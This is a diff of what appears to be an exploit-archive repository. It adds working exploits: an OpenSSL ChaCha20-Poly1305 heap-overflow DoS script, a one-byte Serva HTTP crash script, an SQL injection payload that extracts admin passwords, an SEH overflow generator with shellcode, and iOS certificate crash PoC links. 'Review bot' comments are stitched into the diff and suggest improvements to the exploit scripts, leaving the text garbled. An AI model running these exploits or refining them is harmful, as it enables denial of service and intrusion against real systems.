 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@@ -36865,3 +36868,5 @@ id,file,description,date,author,platform,type,port
 40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
 40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
+40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
+40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
diff --git a/platforms/ios/dos/40906.txt b/platforms/ios/dos/40906.txt
new file mode 100755
index 000000000..6245f9af5
--- /dev/null
+++ b/platforms/ios/dos/40906.txt
@@ -0,0 +1,139 @@ +Source: https://cxsecurity.com/issue/WLB-2016110046 + +iOS 10.1.x Remote memory corruption through certificate file +Credit: Maksymilian Arciemowicz from https://cxsecurity.com + +-------------------------------------------------------------------------------------- +0. Short description +Special crafted certificate file may lead to memory corruption of several processes and the vector attack may be through Mobile Safari or Mail app. Attacker may control the overflow through the certificate length in OCSP field + +-------------------------------------------------------------------------------------- +1. Possible vectors of attack +- Apple Mail (double click on certificate) +- Safari Mobile ( go to special crafted link eg https://cert.cx/appleios10/700k.php which will redirect you to CRT file ) +- other unspecified + +-------------------------------------------------------------------------------------- +2. Symptoms of memory overflow +By appropriate length of the certificate, an attacker can trigger crash of: +- profiled +- Preferences +- other unexpected behaviors + +-------------------------------------------------------------------------------------- +3. Crash log: +- profiled +--------------------------------------------------------------- +{"app_name":"profiled","app_version":"","bug_type":"109","timestamp":"2016-09-20 09:15:09.85 +0200","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXXXXX","slice_uuid":"XXXXXXXXXXXXXX","build_version":"","is_first_party":true,"share_with_app_devs":false,"name":"profiled"} +Incident Identifier: XXXXXXXXXXXXXX +CrashReporter Key: XXXXXXXXXXXXXX +Hardware Model: iPhone6,2 +Process: profiled [1595] +Path: /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled +Identifier: profiled +Version: ??? 
+Code Type: ARM-64 (Native) +Role: Unspecified +Parent Process: launchd [1] +Coalition: [253] + + +Date/Time: 2016-09-20 09:15:09.7892 +0200 +Launch Time: 2016-09-20 09:15:01.1603 +0200 +OS Version: iPhone OS 10.0.1 (14A403) +Report Version: 104 + +Exception Type: EXC_BAD_ACCESS (SIGSEGV) +Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016e193ca0 +Termination Signal: Segmentation fault: 11 +Termination Reason: Namespace SIGNAL, Code 0xb +Terminating Process: exc handler [0] +Triggered by Thread: 2 + +--------------------------------------------------------------- + +- Preferences +--------------------------------------------------------------- +{"app_name":"Preferences","timestamp":"2016-09-20 01:11:44.56 +0200","app_version":"1","slice_uuid":"XXXXXXXXXXX","adam_id":0,"build_version":"1.0","bundleID":"com.apple.Preferences","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXX","name":"Preferences"} +Incident Identifier: XXXXXXXXXXX +CrashReporter Key: XXXXXXXXXXX +Hardware Model: iPhone6,2 +Process: Preferences [1517] +Path: /Applications/Preferences.app/Preferences +Identifier: com.apple.Preferences +Version: 1.0 (1) +Code Type: ARM-64 (Native) +Role: Foreground +Parent Process: launchd [1] +Coalition: com.apple.Preferences [754] + + +Date/Time: 2016-09-20 01:11:43.4478 +0200 +Launch Time: 2016-09-20 01:10:54.3002 +0200 +OS Version: iPhone OS 10.0.1 (14A403) +Report Version: 104 + +Exception Type: EXC_BAD_ACCESS (SIGSEGV) +Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016fc6df90 +Termination Signal: Segmentation fault: 11 +Termination Reason: Namespace SIGNAL, Code 0xb +Terminating Process: exc handler [0] +Triggered by Thread: 0 +--------------------------------------------------------------- + + +Logs: +============================== +Sep 20 20:17:02 xscxsc com.apple.CoreSimulator.SimDevice.27D...8F.launchd_sim[1905] (com.apple.managedconfiguration.profiled[3085]): Service 
exited due to signal: Segmentation fault: 11 +Sep 20 20:17:02 xscxsc MobileSafari[2870]: (Error) MC: Queue data for acceptance error. Error: NSError: +Desc : Couldn’t communicate with a helper application. +Sugg : Try your operation again. If that fails, quit and relaunch the application and try again. +Domain : NSCocoaErrorDomain +Code : 4097 +Extra info: +{ +NSDebugDescription = "connection to service named com.apple.managedconfiguration.profiled"; +} +Sep 20 20:17:02 xscxsc profiled[3133]: (Note ) profiled: Service starting... +============================== + +-------------------------------------------------------------------------------------- +4. PoC +https://cert.cx/appleios10/300k.php +https://cert.cx/appleios10/500k.php +https://cert.cx/appleios10/700k.php +https://cert.cx/appleios10/900k.php + +or https://cert.cx/appleios10/expl.html + +just click on this link by using Safari. + +EDB Proofs of Concept Mirror: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip + +-------------------------------------------------------------------------------------- +5. Safari and sandbox +How is possible that safari don't ask user before run 'Preferences' app to start process of importing certificate? Safari automatically start new process without asking user for acceptance of this operation what can be exploited through http redirect to untrusted content. + +-------------------------------------------------------------------------------------- + +6. 
References +CAPEC-44: Overflow Binary Resource File +https://capec.mitre.org/data/definitions/44.html +https://cert.cx/ +https://cxsecurity.com/ + +Best Regards/Pozdrowienia/С наилучшими пожеланиями +Maksymilian Arciemowicz + +References: + +https://support.apple.com/HT207422 +https://support.apple.com/HT207425 +https://support.apple.com/HT207426 +https://cert.cx/appleios10/300k.php +https://cert.cx/appleios10/500k.php +https://cert.cx/appleios10/700k.php +https://cert.cx/appleios10/900k.php +https://cert.cx/appleios10/expl.html +https://capec.mitre.org/data/definitions/44.html \ No newline at end of file diff --git a/platforms/linux/dos/40899.py b/platforms/linux/dos/40899.py new file mode 100755 index 000000000..d7aabc678 --- /dev/null +++ b/platforms/linux/dos/40899.py 
@@ -0,0 +1,123 @@
+# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
+# Date: 11-12-2016
+# Software Link: https://www.openssl.org/source/old/1.1.0/
+# Exploit Author: Silverfox
+# Contact: http://twitter.com/___Silverfox___
+# Website: https://www.silverf0x00.com/
+# CVE: CVE-2016-7054
+# Category: Denial of Service
+# Type: Remote
+# Platform: Multiple
+
+1. Description
+
+Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.
+
+https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054
+https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
+
+
+2. Proof of Concept
+
+ a. Download and compile OpenSSL 1.1.0a or b
+ b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
+ c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
+ d. OpenSSL Instance crashes causing DOS
+
+### Exploit Code ###
+'''
+ * In no event shall the author be liable
+ * for any direct, indirect, incidential, special, exemplary or
+ * consequential damages, including, but not limited to, procurement
+ * of substitute goods or services, loss of use, data or profits or
+ * business interruption, however caused and on any theory of liability,
+ * whether in contract, strict liability, or tort, including negligence
+ * or otherwise, arising in any way out of the use of this software,
+ * even if advised of the possibility of such damage. 
+'''
+from __future__ import print_function
+import traceback
+import sys
+
+from tlsfuzzer.runner import Runner
+from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
+ ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
+ FinishedGenerator, ApplicationDataGenerator, \
+ fuzz_encrypted_message
+from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
+ ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
+ ExpectAlert, ExpectClose, ExpectServerKeyExchange
+
+from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
+
+def usage() :
+ return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])
+
+def main():
+ if len(sys.argv) < 3:
+ print(usage())
+ return -1
+ conversations = {}
+ # 16 chars: POLY1305 tag 128 bit
+ # Tampering one bit suffices to damage the mac
+ # The payload has to be long enough to trigger heap overflow
+ n = 15000
+ fuzzes = [(-1, 1)]
+ for pos, val in fuzzes:
+ conversation = Connect(sys.argv[1], int(sys.argv[2]))
+ node = conversation
+ ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
+ node = node.add_child(ClientHelloGenerator(ciphers))
+ node = node.add_child(ExpectServerHello())
+ node = node.add_child(ExpectCertificate())
+ node = node.add_child(ExpectServerKeyExchange())
+ node = node.add_child(ExpectServerHelloDone())
+ node = node.add_child(ClientKeyExchangeGenerator())
+ node = node.add_child(ChangeCipherSpecGenerator())
+ node = node.add_child(FinishedGenerator())
+ node = node.add_child(ExpectChangeCipherSpec())
+ node = node.add_child(ExpectFinished())
+ node = node.add_child(fuzz_encrypted_message(
+ ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
+ node = node.add_child(ExpectAlert(AlertLevel.fatal,
+ AlertDescription.bad_record_mac))
+ node = node.add_child(ExpectClose())
+
+ conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
+ conversation
+
+ # run the conversation
+ good = 0
+ bad = 0
+
+ for conversation_name in conversations:
+ conversation = conversations[conversation_name]
+ #print(conversation_name + "...")
+ runner = Runner(conversation)
+ res = True
+ try:
+ runner.run()
+ except:
+ print("Error while processing")
+ print(traceback.format_exc())
+ res = False
+ if res:
+ good+=1
+ print("OK")
+ else:
+ bad+=1
+
+ print("Test end")
+ print("successful: {0}".format(good))
+ print("failed: {0}".format(bad))
+
+ if bad > 0:
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
+### End of Exploit Code ###
+
+3. Solution:
+
+Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.
\ No newline at end of file
diff --git a/platforms/php/webapps/26326.html b/platforms/php/webapps/26326.html
deleted file mode 100755
index 00531d491..000000000
--- a/platforms/php/webapps/26326.html
+++ /dev/null
@@ -1,14 +0,0 @@
-source: http://www.securityfocus.com/bid/15017/info
-
-myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.
-
-Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
-
-
-
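Review bot: `main()` returns -1 when the destination arguments are missing, but the `if __name__ == "__main__": main()` guard discards that value, so a usage error exits with status 0 while a failed run exits 1 through `sys.exit(1)`; making the guard `sys.exit(main())` reports failure on both paths. The bare `except:` around `runner.run()` also catches `KeyboardInterrupt` and `SystemExit`, so an interrupted run is counted as a failed conversation instead of stopping the script; `except Exception:` keeps the traceback printing without swallowing those. Since `fuzzes` holds a single entry, `good` and `bad` can only ever be 0 or 1 here, which is worth a one-line comment if more XOR positions are added later.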
- \ No newline at end of file diff --git a/platforms/php/webapps/27957.txt b/platforms/php/webapps/27957.txt deleted file mode 100755 index f638eb0ee..000000000 --- a/platforms/php/webapps/27957.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/18241/info - -MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. - -An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. - -Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available. - -http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script] - -http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script] - diff --git a/platforms/php/webapps/40904.txt b/platforms/php/webapps/40904.txt new file mode 100755 index 000000000..552493d34 --- /dev/null +++ b/platforms/php/webapps/40904.txt 
@@ -0,0 +1,27 @@ +# Exploit Title: SQL Injection In Smart Guard Network Manager Api +# Date: 03/12/2016 +# Exploit Author: Rahul Raz +# Vendor Homepage: http://www.xsinfoways.com/ +# Software Name: Smart Guard Network Manager +# Version: 6.3.2 +# Tested on: Ubuntu Linux + +Vulnerability type: CWE-89: Improper Neutralization of Special Elements +used in an SQL Command ('SQL Injection') + +The menu_id GET parameter on /view_logs/search_all_history.php in +not filtered properly and leads to SQL Injection + +Authentication Required: No + +SQL injec type- error/xpath. + +Any unauthenticated user can inject SQL commands on the +/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select +make_set(511,0,SUBSTRING(password,1,20),1) from +login_master limit 0,1 ))-- - + +So an user can fetch admin details and can easily get root on that server +if server is SmartGuard 6.0A Revolutions as php runs as user root by +default. +This this vulnerability can make whole server vulnerable . diff --git a/platforms/php/webapps/40908.html b/platforms/php/webapps/40908.html new file mode 100755 index 000000000..0486afee7 --- /dev/null +++ b/platforms/php/webapps/40908.html @@ -0,0 +1,64 @@ + + +
+ + alert(1)\"> + + + + + + + +
+ + \ No newline at end of file diff --git a/platforms/windows/dos/40905.py b/platforms/windows/dos/40905.py new file mode 100755 index 000000000..b78cda58b --- /dev/null +++ b/platforms/windows/dos/40905.py 
@@ -0,0 +1,72 @@
+#!/usr/bin/env python
+#
+#
+# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
+#
+#
+# Vendor: Patrick Masotta
+# Product web page: http://www.vercot.com
+# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
+#
+# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
+# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
+# on a single exe all of the underlying server protocols and services required by the
+# most complex PXE network boot/install scenarios simultaneously delivering Windows and
+# non-Windows assets to BIOS and UEFI based targets.
+#
+# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
+# This can be exploited to cause a denial of service attack resulting in application crash.
+#
+# ----------------------------------------------------------------------------
+#
+# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
+# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
+# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
+# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
+# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
+# KERNELBASE!RaiseException+0x58:
+# 74a1c54f c9 leave
+# 0:013> kb
+# # ChildEBP RetAddr Args to Child
+# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
+# WARNING: Stack unwind information not available. Following frames may be wrong. 
+# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
+# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
+# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
+# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
+# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
+# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
+#
+# ----------------------------------------------------------------------------
+#
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2016-5378
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
+#
+#
+# 17.11.2016
+#
+
+import sys,socket
+
+if len(sys.argv) < 3:
+
+ print '\nUsage: ' + sys.argv[0] + ' \n'
+ print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
+ sys.exit(0)
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect = s.connect((host, port))
+s.settimeout(251)
+s.send('z')
+s.close
diff --git a/platforms/windows/dos/40907.html b/platforms/windows/dos/40907.html
new file mode 100755
index 000000000..a6ffdcdba
--- /dev/null
+++ b/platforms/windows/dos/40907.html
@@ -0,0 +1,47 @@ + + + + + + + + +
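Review bot: The last line `s.close` names the bound method without calling it, so the socket is never closed explicitly and is only released when the interpreter exits; it should read `s.close()`. The assignment `connect = s.connect((host, port))` binds `None` and is never read, so the plain call `s.connect((host, port))` is clearer, and because `s.settimeout(251)` runs after the connect, the connect itself has no timeout — moving it before the connect would bound that call too. The script uses Python 2 `print` statements, so under a `python` that resolves to Python 3 the `#!/usr/bin/env python` shebang yields a SyntaxError before any argument check; `#!/usr/bin/env python2` pins the intended interpreter.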
+
+ + + +
diff --git a/platforms/windows/local/40903.py b/platforms/windows/local/40903.py
new file mode 100755
index 000000000..6d52a7cb1
--- /dev/null
+++ b/platforms/windows/local/40903.py
@@ -0,0 +1,32 @@
+#!python
+#####################################################################################
+# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
+# Date: 2016-12-10
+# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
+# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
+# Tested on: Win7 SP1
+# Author: malwrforensics
+# Details: Help->Enter registration code... and paste the text from poc.txt
+#####################################################################################
+
+def write_poc(fname, buffer):
+ fhandle = open(fname , 'wb')
+ fhandle.write(buffer)
+ fhandle.close()
+
+fname="poc.txt"
+buf = '\x41' * 0xfe0
+
+#########################
+# Shellcode
+# MessageBox ad infinitum
+#########################
+shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
+"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
+"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
+
+junk = '\x41' * 0x5e
+jmp = '\xeb\x82\x41\x41'
+nseh = '\xec\x14\x40\x00'
+buffer = buf + shellcode + junk + jmp + nseh
+write_poc(fname, buffer)
\ No newline at end of file
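Review bot: `write_poc` pairs a bare `open(fname , 'wb')` with an explicit `close()`, so an exception raised by `write` leaves the handle open; `with open(fname, 'wb') as fhandle: fhandle.write(buffer)` closes it on every path. The parameter name `buffer` shadows both the Python 2 builtin and the module-level `buffer` variable, and since the payload is assembled from `str` literals, a binary-mode `write` raises TypeError under Python 3 — the `#!python` shebang does not pin a version, so a short docstring such as `"""Write *buffer* (a Python 2 str) to *fname* in binary mode."""` would make the expected interpreter explicit. The function currently has no docstring at all.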